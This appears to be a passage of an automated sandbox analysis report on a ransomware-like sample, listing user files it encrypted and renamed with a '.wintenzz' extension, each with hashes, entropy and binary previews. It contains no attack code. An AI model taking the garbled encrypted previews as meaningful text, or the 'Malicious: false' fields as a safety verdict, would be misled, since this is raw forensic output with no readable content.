J=.Ba.....o.

C:\Users\user\Documents\UBVUNTSCZJ.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.787310774245225
Encrypted:	false
SSDEEP:	24:56LK5w4hnJ8jWFbviiGGgYe/6GHi6b3/hRmUYKlywcpFBZOpI5mK:56LewHyFbKiDgYe/DD35rYSywczBZOG9
MD5:	D717EAD1669DECD6BC05B0694B97462D
SHA1:	25F36A0EDBD7710AB74E8FE829D63512D7D91CA8
SHA-256:	53FF66E0A937AC8ED9EE2A0904FE50A27BC4B82210F67F8FC407D94B333EC50C
SHA-512:	866D07FFDF1B86287A2119BB0A71A83439456B3395FCB9345A0AF1282E516CD890A94AD314CA964EA6A5DD46CBF7E4B308A1B3B501D7FB2230EEB781ABF19B2B
Malicious:	false
Preview:	................0cY4d4JKYKhpfguGLz1Inwzi.........E.....'.D.9.l$....yqsV8?5G...... @$.@....j..D.7....-....r4Ff...M..>N.....9..Vc..........c;....{.....P.\S"..hIO..5.b.....P...q.x?..;6.L..O.Hg....(....Du\|.../H..x....U...9.BN.t..l...g?r..W....."68u.L....i8..q\|p.n.@.............m)..84..c..B)L..#3....R..MD..d.>.?._.....EG....f....Y..^..l......C.-..i.l..A.?#.J.Fz.>..4J....Ss..g..7..........c..F.238......%....d...AD......A;..Q6.C...(..i.!....,\s....3.T".s.....G..J....o...^.b.eL...2..#.(.ve.q8.......'e.........V[.8BZ...c5........@x.....Wu.cQ..-.A...O.4...U._........\|.E.]..v...tS...x..^..S<l.x.c.:.Z.KC.....)-.~....0Z.{.;Q.....,..y...%..\..I..G=R................N..F.....$..0.e.C:......3..t.SA1..+..G.6.oP.J.xm....@0.c.D\.G.~...&T-..XBK-c..3i.be.....l<5#..'..<.m....Gy......m....N."4...b.....{..Sx.....O.F!t$7..._"...B<.>...K..iz7[0N4....5.7Y..d...G.....G.$..y"..Q..2..1[G.d...d...T?......1CFmq....K.M....m.r..7{]..I.>..H..;.h...<...H..%.a@.J=.Ba.....o.

C:\Users\user\Documents\WHZAGPPPLA.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.798346839164837
Encrypted:	false
SSDEEP:	24:5crE0JTzc9yIqdJLb8WQRh6wg3B5K7ZsvsVzgn80uGt:5ybVzEyIqsWk6BB5xs28PGt
MD5:	430D0147103B197817F01729CED941D7
SHA1:	FF41C97A2BE09DC8236D8353226E015B7649166A
SHA-256:	B3D3701D59EFD4C2F90F7AF52262633DDC5390B072B6AA0070BF3910E7C39860
SHA-512:	70C1567273BAD0FD1E569438CE7973BE167C8695012C936F22EB65B97FB6B9652697523FB18A3F8A87D89219BD53A68A9857658CED3424C0EFECFCCE90FF9253
Malicious:	false
Preview:	................qzSgSEWhvrcFdRkejNI2ua4L..............Bcq.......Z.g......g...<...O....j..[.E>l.w....\......]...x#..k.U..#...E.Zbd....n.'...NT%#.>...w........A!_...{..L.S.....;9....P....&U..<..[..-.ks.........q...D.n....W...:...ip..Q....Y...-.\|n..)!>K.S.... ..........,.@.u....$b..........?}2.....B..R.~..=....fS..{...=%C.A.....b...ISjS.Xb..%...u...7g.r.T..R1....u...j.&.....F.D<.R.P^mJA....2&ATT..PC...Se.xs...L..A..!..........tH>1D.=.G'...c.:.\.......T.....osD.N..j..w.... ..i,.IPd._6.../9.'g.'m....;.......n.....I.{K..F. u...[...U....,..h.<........JUd{...>.2......'.-..`....sz>2%..?V.6...{..J._...$.~i.P.t.t.....{.V].O......&..j..:.=3 2.:L;.L.s[..G.G;c..!r...="...3...g........<..u...{.u.t..CH...M`.l...wk.l9L.9'..C...M..z..m.\.Q;......qh...r.0...+^w..]...V........2...T.C......H.E)..`....P......l.....J..../.e'.\|A..\|\|Bo$.B.........q>..._3.....m.y&...+^C.>...p."+...L..z.._....**..]9...-...l..!..2.\|.Y......Z...t..='....4..z8Xp.`.a.5RO

C:\Users\user\Documents\WHZAGPPPLA.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.798346839164837
Encrypted:	false
SSDEEP:	24:5crE0JTzc9yIqdJLb8WQRh6wg3B5K7ZsvsVzgn80uGt:5ybVzEyIqsWk6BB5xs28PGt
MD5:	430D0147103B197817F01729CED941D7
SHA1:	FF41C97A2BE09DC8236D8353226E015B7649166A
SHA-256:	B3D3701D59EFD4C2F90F7AF52262633DDC5390B072B6AA0070BF3910E7C39860
SHA-512:	70C1567273BAD0FD1E569438CE7973BE167C8695012C936F22EB65B97FB6B9652697523FB18A3F8A87D89219BD53A68A9857658CED3424C0EFECFCCE90FF9253
Malicious:	false
Preview:	................qzSgSEWhvrcFdRkejNI2ua4L..............Bcq.......Z.g......g...<...O....j..[.E>l.w....\......]...x#..k.U..#...E.Zbd....n.'...NT%#.>...w........A!_...{..L.S.....;9....P....&U..<..[..-.ks.........q...D.n....W...:...ip..Q....Y...-.\|n..)!>K.S.... ..........,.@.u....$b..........?}2.....B..R.~..=....fS..{...=%C.A.....b...ISjS.Xb..%...u...7g.r.T..R1....u...j.&.....F.D<.R.P^mJA....2&ATT..PC...Se.xs...L..A..!..........tH>1D.=.G'...c.:.\.......T.....osD.N..j..w.... ..i,.IPd._6.../9.'g.'m....;.......n.....I.{K..F. u...[...U....,..h.<........JUd{...>.2......'.-..`....sz>2%..?V.6...{..J._...$.~i.P.t.t.....{.V].O......&..j..:.=3 2.:L;.L.s[..G.G;c..!r...="...3...g........<..u...{.u.t..CH...M`.l...wk.l9L.9'..C...M..z..m.\.Q;......qh...r.0...+^w..]...V........2...T.C......H.E)..`....P......l.....J..../.e'.\|A..\|\|Bo$.B.........q>..._3.....m.y&...+^C.>...p."+...L..z.._....**..]9...-...l..!..2.\|.Y......Z...t..='....4..z8Xp.`.a.5RO

C:\Users\user\Downloads\BQJUWOYRTO.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.820474596612677
Encrypted:	false
SSDEEP:	24:8ZQ74FOjhR+gz/0QkagrOwuJ68jF3mTtaw559H3CN:8Zw4I9NzcQkXsUG3mZd7yN
MD5:	0C66EE60F65C64C30D44DB8407FE8012
SHA1:	855F0BE0A0382AE0B2AE378674328815F44A7F13
SHA-256:	B39D02A4C4B55263D324A42F3B57A47DFDCD13E25DA90646013ABD6A4DB55FBC
SHA-512:	178ADD3E752907A79A01362A909BCB99492800FAA145F76C9F02413FD18B437CC9B9FF7E95F609A18C5F55BC8A6565073C6623293B74399641D5A33280C6622F
Malicious:	false
Preview:	................VXxaSCurbgj6DPLrErRTcrLt...............m_Slf....w;.:$...V...^H.a.2.)So..9.F....e.r..i-.....73........%E...qD.o..lI.n...~.q=...?3...a....X.I..8`..>.o.W..7.o._.N"H4.....m.@..s...D.zc.......,G...k7.v."......T~..Tn.3..\|.n...Y..NA...Ne..i@(..>.V.d.O...v.......I.k..........\.......o........p.pt..L....m.M....d.-ubc ..........h..B..R..g...D...>z>..&-.@@B.'.L..z`@.n'.'.&.C#8I...O..,...{...Y.Q.&..w....n..E....p......Mj...[.i0.......DZ.....4."6..yV.<.....px2i.2(.O..S..7s.B./$'Th...C....D..7..^....Z......5.Y.b[..N..td....gy\|...!2g...1..........Wn....O...sdr]..k.S.P.vM%.)P....P$._..Wh.N..D..=/GQnzC....n.A\.mN.......sJ@}I...."....&H.E..o.m.....B.{7=.oe..4q........%.W.X.u.....V..>...)x..]7Ws..y.w%f.c...V....1..D...qg....j<.!.]..0z...... .pM...q...E<...M1.-.o.5u....Vp..C.....WW.A..fi.F>Ik.a.....6.3S......M.f..^..j2.3....S..0..\...G.F..Nc.j.....J....@.M..'..\..}\..........q.....).8.o=`\|9WJ...n....i.....}.48..../%q......E.zG.;......

C:\Users\user\Downloads\BQJUWOYRTO.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.820474596612677
Encrypted:	false
SSDEEP:	24:8ZQ74FOjhR+gz/0QkagrOwuJ68jF3mTtaw559H3CN:8Zw4I9NzcQkXsUG3mZd7yN
MD5:	0C66EE60F65C64C30D44DB8407FE8012
SHA1:	855F0BE0A0382AE0B2AE378674328815F44A7F13
SHA-256:	B39D02A4C4B55263D324A42F3B57A47DFDCD13E25DA90646013ABD6A4DB55FBC
SHA-512:	178ADD3E752907A79A01362A909BCB99492800FAA145F76C9F02413FD18B437CC9B9FF7E95F609A18C5F55BC8A6565073C6623293B74399641D5A33280C6622F
Malicious:	false
Preview:	................VXxaSCurbgj6DPLrErRTcrLt...............m_Slf....w;.:$...V...^H.a.2.)So..9.F....e.r..i-.....73........%E...qD.o..lI.n...~.q=...?3...a....X.I..8`..>.o.W..7.o._.N"H4.....m.@..s...D.zc.......,G...k7.v."......T~..Tn.3..\|.n...Y..NA...Ne..i@(..>.V.d.O...v.......I.k..........\.......o........p.pt..L....m.M....d.-ubc ..........h..B..R..g...D...>z>..&-.@@B.'.L..z`@.n'.'.&.C#8I...O..,...{...Y.Q.&..w....n..E....p......Mj...[.i0.......DZ.....4."6..yV.<.....px2i.2(.O..S..7s.B./$'Th...C....D..7..^....Z......5.Y.b[..N..td....gy\|...!2g...1..........Wn....O...sdr]..k.S.P.vM%.)P....P$._..Wh.N..D..=/GQnzC....n.A\.mN.......sJ@}I...."....&H.E..o.m.....B.{7=.oe..4q........%.W.X.u.....V..>...)x..]7Ws..y.w%f.c...V....1..D...qg....j<.!.]..0z...... .pM...q...E<...M1.-.o.5u....Vp..C.....WW.A..fi.F>Ik.a.....6.3S......M.f..^..j2.3....S..0..\...G.F..Nc.j.....J....@.M..'..\..}\..........q.....).8.o=`\|9WJ...n....i.....}.48..../%q......E.zG.;......

C:\Users\user\Downloads\BWDRWEEARI.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.784065290678882
Encrypted:	false
SSDEEP:	24:Yu9HsnlKjF2s3e9/GKIX4B6WtvV2dSrpvxXMfbG:YuBsnUjF2Bdh1BPtt2OpvpuG
MD5:	221FA89473B793CED5C89350A8554B84
SHA1:	4587400C68A0467036EFC6BAEC074CCBFEBCA671
SHA-256:	FD0924130928DE4B331B9F24C878D025D098EDFF7A6DE9D68329866D92F452AC
SHA-512:	BD11788E4DAEB3C7076E7A6415E978E9B0CDF1AC09ED3BD194146B803AAF42C3823B606E75D42B0B02332CA9692F1E88501F5AB4A612405A1EB045EA95D8B8DD
Malicious:	false
Preview:	................rqRt52UJ5F7HS1a1mND9VDLk..........s.?SM.9.W0~.t......r.G...P3..9"2\{Z3.......C...J.c1....^..t.fn.7...(..W.v<.`SHq..E..]...d......!/..w.@......5...fZ].`.w/x.9.w.,...V25...b....a...,..,[.7...4.U..z...T.'.....#.S..r1....<3....m.oJT........XK.....`l.\|......>_.%..N<1....\|...z/...._......I...$....935..(.d....]Rn.B..0.c....H#z..oi..J4....7.FMU'..I.P<..7.+.U.s.V+..J7.....6...}........0y......@v.......j.b...W......../.&.B...6.Z<...[.&..-D....3........VXz.a...PC......i...[..E=....!k.7myIf.i.,.0<....f..#...g.p...W.)....~.....7..v...td.T)..W.8...}....f@..)....TQ.x./~.........J..a..8..D.r...(}........O`.v.b..f....._....?.. .E.R....A\|.6V.,Y.......s...=9DaG\N"0..7...........[^=M.H..=1j......b..9.8._.Y)K..4..N....%..=w..B3.B.\.....0..}v.Y!.[e}..6..l....Y...I.c.;[.-....xg..8....L..M{..W..E.:..m.}.0.j.-..e>}U~az.\...D...'......o8Ip..J!.e.e,.]_.z..wm._._,.4........#b.....W=.<.}...c..U...E...l5......X.C^z.._....u.j.}....i.m...M.L.

C:\Users\user\Downloads\BWDRWEEARI.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.784065290678882
Encrypted:	false
SSDEEP:	24:Yu9HsnlKjF2s3e9/GKIX4B6WtvV2dSrpvxXMfbG:YuBsnUjF2Bdh1BPtt2OpvpuG
MD5:	221FA89473B793CED5C89350A8554B84
SHA1:	4587400C68A0467036EFC6BAEC074CCBFEBCA671
SHA-256:	FD0924130928DE4B331B9F24C878D025D098EDFF7A6DE9D68329866D92F452AC
SHA-512:	BD11788E4DAEB3C7076E7A6415E978E9B0CDF1AC09ED3BD194146B803AAF42C3823B606E75D42B0B02332CA9692F1E88501F5AB4A612405A1EB045EA95D8B8DD
Malicious:	false
Preview:	................rqRt52UJ5F7HS1a1mND9VDLk..........s.?SM.9.W0~.t......r.G...P3..9"2\{Z3.......C...J.c1....^..t.fn.7...(..W.v<.`SHq..E..]...d......!/..w.@......5...fZ].`.w/x.9.w.,...V25...b....a...,..,[.7...4.U..z...T.'.....#.S..r1....<3....m.oJT........XK.....`l.\|......>_.%..N<1....\|...z/...._......I...$....935..(.d....]Rn.B..0.c....H#z..oi..J4....7.FMU'..I.P<..7.+.U.s.V+..J7.....6...}........0y......@v.......j.b...W......../.&.B...6.Z<...[.&..-D....3........VXz.a...PC......i...[..E=....!k.7myIf.i.,.0<....f..#...g.p...W.)....~.....7..v...td.T)..W.8...}....f@..)....TQ.x./~.........J..a..8..D.r...(}........O`.v.b..f....._....?.. .E.R....A\|.6V.,Y.......s...=9DaG\N"0..7...........[^=M.H..=1j......b..9.8._.Y)K..4..N....%..=w..B3.B.\.....0..}v.Y!.[e}..6..l....Y...I.c.;[.-....xg..8....L..M{..W..E.:..m.}.0.j.-..e>}U~az.\...D...'......o8Ip..J!.e.e,.]_.z..wm._._,.4........#b.....W=.<.}...c..U...E...l5......X.C^z.._....u.j.}....i.m...M.L.

C:\Users\user\Downloads\BXAJUJAOEO.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.788441732373124
Encrypted:	false
SSDEEP:	24:R+MwO6LmtNzb8BGvcrltJR3rYvCDkUc906H16Gupn:R+jOLtNzrItJRkv4Fc+638
MD5:	B358E41AD80B101C69E771093ABA5949
SHA1:	FD91DAE9B8A43F010CD31B23501F121B531D28F8
SHA-256:	F4C3424FD23DBC5DBB3A3174C3203D03DF4A7DBD31E37BAEA966BEF797F84F6D
SHA-512:	CC86C93E09C329A7E261736C63C6835D4C326F95F6C4D36FEADBA8683228055EA844266C94907D75AD209A30ED44873D0B2601E250BA3B9F83E34E9ECDD6E950
Malicious:	false
Preview:	................5yFtqwAkK4x4LP110wmyPFX1........[T..~Q.6B.......j.#h.>..:."..h<\|..e....J.M.yi...,.B..\|N%...7..6:....S.Z....v.)...;0......t......:C..@....h...O.........S\.P.G.....H.x..8.d..,.\|...\.b....<s/..9&K.....O/S..6D.c...2....N..z3...[1s,\..{{...'.m^..#........8......$..O.n.....W.e.kf.H....z[z-wf..l ....\.0.F..3ew..X._.......lM..\cx.....E...^...3..?8.......,Qi..-..h.Q..(VD.....A.j..C..3q.NP.`...M-".....}B...'~.h.23 /....Q...\V..z.h8.............b~.4\|.....5B'.a...C...m\|...b..)L...t..S...V..m10...~...u(L.a....]p_;....\|..9Z}hi...J.k....L...l+.X..........[..5..Lc?Cc5...HB....\|.e..f........Qf..2.m.739...n...c;"m....N..v..lEh..s.0z3...YC.2,...O.T.N_........L.....0..[.:">.m..1.j..........c......%Yo..tc.@L!...P. .z..........bn.oy......c4h...aYV.f.$.).....J-.f..[.B.........(...k"...X.(..T.f3r.G.~...0[...d...?..8....'.. .U.h.-....f.@..C.F..v.......q.9.....w.t.A..$.S.U.......$L....@...>./.....(X.\K......W50.....`3E=...E.j..

C:\Users\user\Downloads\BXAJUJAOEO.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.788441732373124
Encrypted:	false
SSDEEP:	24:R+MwO6LmtNzb8BGvcrltJR3rYvCDkUc906H16Gupn:R+jOLtNzrItJRkv4Fc+638
MD5:	B358E41AD80B101C69E771093ABA5949
SHA1:	FD91DAE9B8A43F010CD31B23501F121B531D28F8
SHA-256:	F4C3424FD23DBC5DBB3A3174C3203D03DF4A7DBD31E37BAEA966BEF797F84F6D
SHA-512:	CC86C93E09C329A7E261736C63C6835D4C326F95F6C4D36FEADBA8683228055EA844266C94907D75AD209A30ED44873D0B2601E250BA3B9F83E34E9ECDD6E950
Malicious:	false
Preview:	................5yFtqwAkK4x4LP110wmyPFX1........[T..~Q.6B.......j.#h.>..:."..h<\|..e....J.M.yi...,.B..\|N%...7..6:....S.Z....v.)...;0......t......:C..@....h...O.........S\.P.G.....H.x..8.d..,.\|...\.b....<s/..9&K.....O/S..6D.c...2....N..z3...[1s,\..{{...'.m^..#........8......$..O.n.....W.e.kf.H....z[z-wf..l ....\.0.F..3ew..X._.......lM..\cx.....E...^...3..?8.......,Qi..-..h.Q..(VD.....A.j..C..3q.NP.`...M-".....}B...'~.h.23 /....Q...\V..z.h8.............b~.4\|.....5B'.a...C...m\|...b..)L...t..S...V..m10...~...u(L.a....]p_;....\|..9Z}hi...J.k....L...l+.X..........[..5..Lc?Cc5...HB....\|.e..f........Qf..2.m.739...n...c;"m....N..v..lEh..s.0z3...YC.2,...O.T.N_........L.....0..[.:">.m..1.j..........c......%Yo..tc.@L!...P. .z..........bn.oy......c4h...aYV.f.$.).....J-.f..[.B.........(...k"...X.(..T.f3r.G.~...0[...d...?..8....'.. .U.h.-....f.@..C.F..v.......q.9.....w.t.A..$.S.U.......$L....@...>./.....(X.\K......W50.....`3E=...E.j..

C:\Users\user\Downloads\DQOFHVHTMG.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.802133662934775
Encrypted:	false
SSDEEP:	24:bcJnEPR3e4FMgd9McFbMF+bxnzpMWKHKog2vg8ebUQX436C9:QJ7gjdO6MUlzpGHKoj48ebUQI36m
MD5:	D37184D71354279A1892A170AD16B489
SHA1:	20E2A883CD45C2044F82E398E6599DBE40A70F65
SHA-256:	A4B8DE6C9F8EC8853B1FB4F4390677E6BEAC617414DFEC5E100EEA2706BC95D5
SHA-512:	39484719269AAB8211B27A1A95D0A5A217AD9CDBFF7F97894AEC56F1A93533D17C375D30DC3EDE96316AC58FE311BAAFE66B69C9898490A2B973E66E74B0F3C1
Malicious:	false
Preview:	................8pIAtLhY3uE8dHuDfIcWMHMq............L.)..R..,.T$L...=..eH'....8.1.w.I{..n,.........(.C.....U.!..vO.c..........'..)....Cxn.=N...h.......W.fX.2......".+.8.N..6...W.(..V..0....'].?A.i...{..........q..;.T<0...X..Wn.....`.o...{O...!b2...:....!.\|..N....u..."..?=&.#.0.l.;e...}.0..........>.....hR...].Gc....LW.?.#...9rg....]d...1TQ.\a....+......Q..;...~..C.G.C....Z.!X..k.(.F.86sc....ET..GK..~.~^.'....g..$..$...<..U1z.........2....{..i......I..u.i..^...Xd...M5.ph1j.0/.<..........!......<.KPb+p8...JNz......@5..X.`I..!U'.\|..O/.......e.Z.s...o\.l...I.9.%.wK.wE.\.k..{.y}E\...g.Vf.....B......;.w.p.1....<..n.S....:Z...6...Y6..o.`...R...O..'.cR.i....n.\|p..O.....7..2[..v...o;.,R$%.~Q+..>....tz>y.]DRTX.$.........Kq.. 2/.G...M.u..iJ..=...qb.i....C....0...X.9.\|9.p.o.s`/,..#....f,...?...J.....t...%...g...k..5&e.<.1.x.z"J.....8.@<3....f........n.....W)H..{P...b.J'U.\|.:.h.....$..b.jZryG/T......iZ....p.............u_...........-.]N..O[;......

C:\Users\user\Downloads\DQOFHVHTMG.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.802133662934775
Encrypted:	false
SSDEEP:	24:bcJnEPR3e4FMgd9McFbMF+bxnzpMWKHKog2vg8ebUQX436C9:QJ7gjdO6MUlzpGHKoj48ebUQI36m
MD5:	D37184D71354279A1892A170AD16B489
SHA1:	20E2A883CD45C2044F82E398E6599DBE40A70F65
SHA-256:	A4B8DE6C9F8EC8853B1FB4F4390677E6BEAC617414DFEC5E100EEA2706BC95D5
SHA-512:	39484719269AAB8211B27A1A95D0A5A217AD9CDBFF7F97894AEC56F1A93533D17C375D30DC3EDE96316AC58FE311BAAFE66B69C9898490A2B973E66E74B0F3C1
Malicious:	false
Preview:	................8pIAtLhY3uE8dHuDfIcWMHMq............L.)..R..,.T$L...=..eH'....8.1.w.I{..n,.........(.C.....U.!..vO.c..........'..)....Cxn.=N...h.......W.fX.2......".+.8.N..6...W.(..V..0....'].?A.i...{..........q..;.T<0...X..Wn.....`.o...{O...!b2...:....!.\|..N....u..."..?=&.#.0.l.;e...}.0..........>.....hR...].Gc....LW.?.#...9rg....]d...1TQ.\a....+......Q..;...~..C.G.C....Z.!X..k.(.F.86sc....ET..GK..~.~^.'....g..$..$...<..U1z.........2....{..i......I..u.i..^...Xd...M5.ph1j.0/.<..........!......<.KPb+p8...JNz......@5..X.`I..!U'.\|..O/.......e.Z.s...o\.l...I.9.%.wK.wE.\.k..{.y}E\...g.Vf.....B......;.w.p.1....<..n.S....:Z...6...Y6..o.`...R...O..'.cR.i....n.\|p..O.....7..2[..v...o;.,R$%.~Q+..>....tz>y.]DRTX.$.........Kq.. 2/.G...M.u..iJ..=...qb.i....C....0...X.9.\|9.p.o.s`/,..#....f,...?...J.....t...%...g...k..5&e.<.1.x.z"J.....8.@<3....f........n.....W)H..{P...b.J'U.\|.:.h.....$..b.jZryG/T......iZ....p.............u_...........-.]N..O[;......

C:\Users\user\Downloads\DQOFHVHTMG.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.803816438095375
Encrypted:	false
SSDEEP:	24:oeFNwAG9Vq4lFvS8r7HSkkFILCXn2ZUrkDaXV:oA699nMyRuXn2mZF
MD5:	9C935EEA0655108BD07EC29EDD04D78E
SHA1:	DF671A353DE35685E29C7A6B719AB36FF7D517B2
SHA-256:	ADC5593C75FB14A22EDC9D07D910A0E462C15867F8BB91D670DEDC42B00706D8
SHA-512:	11FDA7ACD2DB74575E1DFF55CCBB303B5A2A4E4734CED1F97D7EDF5B029ABDAE317CA16025E565BC8D0DE412DE41BE124EE408642796A32F4BADCB9C31E2DE07
Malicious:	false
Preview:	................FyYagm3nfbTmRIf3sSq6TA9G........F.:.......9...%.1..4.lt%g.....}....+.....Ah.X..L.S....G.8.........p.._SHnL&...Rc..f..:..Y-..Q=<.a&$Zy,#"..#.M..(.G.....?W@.&Y......i.....9..J..\^.{.sM.........'.J........+.)..>.]..n.9...&,)%.8.X$.V.....L%....o.#..4....t.. (N.....(......'!...n..z#..RW..N.y.S.l.Z..70...4..2.$..a.}....P.....a....P.!.....Y.F."..:{...C..&sy.G...mGz_.D...j+....h-jOO.....)......9.?6{.r=y.G.....56...=....:..."..E.3..3...^...^..'..uI.ya.0.A..4.?.....#6-.Z.o.>8..g.Q`,.bI.jp..O....Y.g.x6y..-....b.T...f...r.....i!...,.c..j...!..S..0...{..2.......<...9..YM.i....G.P.7.....VP;.t"b.C.A..r.N..n.E..\|..Y){....Pn...........%...'..Sj.5.S5.{..=.....p..E..K..4%B}.QU...^\|...!B....U.;.....q.a..^.~.@Q......M.pX.t.J'.....W...i.8..~.t......wF...z.G..7c.-A......{.Zx;.aa...B;R.4l..5..5.NK.s.C....q...-X..N.g..m...E.C.`...@.o....)\|.}..Qe..5+....tG.%^X.....e....-%.J..p....21........W....8..s..bv.[...~....J....W..3...#1.z....d}....J...l.]....

C:\Users\user\Downloads\DQOFHVHTMG.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.803816438095375
Encrypted:	false
SSDEEP:	24:oeFNwAG9Vq4lFvS8r7HSkkFILCXn2ZUrkDaXV:oA699nMyRuXn2mZF
MD5:	9C935EEA0655108BD07EC29EDD04D78E
SHA1:	DF671A353DE35685E29C7A6B719AB36FF7D517B2
SHA-256:	ADC5593C75FB14A22EDC9D07D910A0E462C15867F8BB91D670DEDC42B00706D8
SHA-512:	11FDA7ACD2DB74575E1DFF55CCBB303B5A2A4E4734CED1F97D7EDF5B029ABDAE317CA16025E565BC8D0DE412DE41BE124EE408642796A32F4BADCB9C31E2DE07
Malicious:	false
Preview:	................FyYagm3nfbTmRIf3sSq6TA9G........F.:.......9...%.1..4.lt%g.....}....+.....Ah.X..L.S....G.8.........p.._SHnL&...Rc..f..:..Y-..Q=<.a&$Zy,#"..#.M..(.G.....?W@.&Y......i.....9..J..\^.{.sM.........'.J........+.)..>.]..n.9...&,)%.8.X$.V.....L%....o.#..4....t.. (N.....(......'!...n..z#..RW..N.y.S.l.Z..70...4..2.$..a.}....P.....a....P.!.....Y.F."..:{...C..&sy.G...mGz_.D...j+....h-jOO.....)......9.?6{.r=y.G.....56...=....:..."..E.3..3...^...^..'..uI.ya.0.A..4.?.....#6-.Z.o.>8..g.Q`,.bI.jp..O....Y.g.x6y..-....b.T...f...r.....i!...,.c..j...!..S..0...{..2.......<...9..YM.i....G.P.7.....VP;.t"b.C.A..r.N..n.E..\|..Y){....Pn...........%...'..Sj.5.S5.{..=.....p..E..K..4%B}.QU...^\|...!B....U.;.....q.a..^.~.@Q......M.pX.t.J'.....W...i.8..~.t......wF...z.G..7c.-A......{.Zx;.aa...B;R.4l..5..5.NK.s.C....q...-X..N.g..m...E.C.`...@.o....)\|.}..Qe..5+....tG.%^X.....e....-%.J..p....21........W....8..s..bv.[...~....J....W..3...#1.z....d}....J...l.]....

C:\Users\user\Downloads\IZMFBFKMEB.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.774539528807504
Encrypted:	false
SSDEEP:	24:On0pjy1DmWhPqtPQ6R8/w/Dg4E60Cg2f+ZTsYnX6y:Onijy1KWhPtY/DpERcf+BX6y
MD5:	6F93465F21E7E83C71E245E085FCD48B
SHA1:	4666212169A977A3A440F9D915F469E6BF8B2A26
SHA-256:	5C58C8713EF434A9DB85CA248EA709ACF59C61DB310D6620D1349F8E7BE660B3
SHA-512:	B4DD3A448E8910CD484578286225B6CDEA6B2562A3FB39E65CDD1D4126C8E06B174203F71BB0BF00E2E16A16E5E16B1A8AAAACBC6838133769A49D69D84996EA
Malicious:	false
Preview:	................Y1l7I5R7VU0aEP52zeh1XVyb........z..q.........O..u..)......!5h..<IAU.B>......?=4.RT.u`..Y.b....msA..>Jz.>U0.$.1.'$]....$:.kE.m#.b.RT..(E=R...C7.........c...eE..8....cVi.!.{@k..#./...Z...&..0..0..j.1.$.. .Q$N..5V.\|.g.......f.....Uo..B...\R...z..y..vU.N...$...r5.).5..j....W.].....V.Fae...{@~...]{6...L....&v...P...n.Z..w+,F.....4...(.+ ...c..9...T..w.....w&6GW..(.Q......t.Y.f..........l%....Y..U.t...>>..8.?...D.....L6...[..p.k..q.f.K....G..X:K....t!..f<.l>?.1.P.r:5....I...$.....A..T..Y9O..-...ZN.rD...Jl...a..3...5.VN.uA....IY&..s.(.@A.8;...\2j^...O.... ..`...F6.(.dT......2..f...,m..`.._.{.....<...>@.6X..(l.t6.W.a\|w~.....D...S[...'.t...y..,G....7Z.........}%~.Tt...v;4......#8.C.....9l#%...><..`..r........R.5w*.8.B...u.G;...B..R.......6....A...lS....[...2$.8..b.nhJ...agyM..9%h$.......w..FM.)U.x.SA....o.dP...l<7d...$.[.R..6..........>.....r..j...gHcu.a.1g..)VntU....w...K.Ukm.......O....J.w0$...+i.IE..@..E...4.L.'76.R..w.....b{.J. >..$.....t.

C:\Users\user\Downloads\IZMFBFKMEB.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.774539528807504
Encrypted:	false
SSDEEP:	24:On0pjy1DmWhPqtPQ6R8/w/Dg4E60Cg2f+ZTsYnX6y:Onijy1KWhPtY/DpERcf+BX6y
MD5:	6F93465F21E7E83C71E245E085FCD48B
SHA1:	4666212169A977A3A440F9D915F469E6BF8B2A26
SHA-256:	5C58C8713EF434A9DB85CA248EA709ACF59C61DB310D6620D1349F8E7BE660B3
SHA-512:	B4DD3A448E8910CD484578286225B6CDEA6B2562A3FB39E65CDD1D4126C8E06B174203F71BB0BF00E2E16A16E5E16B1A8AAAACBC6838133769A49D69D84996EA
Malicious:	false
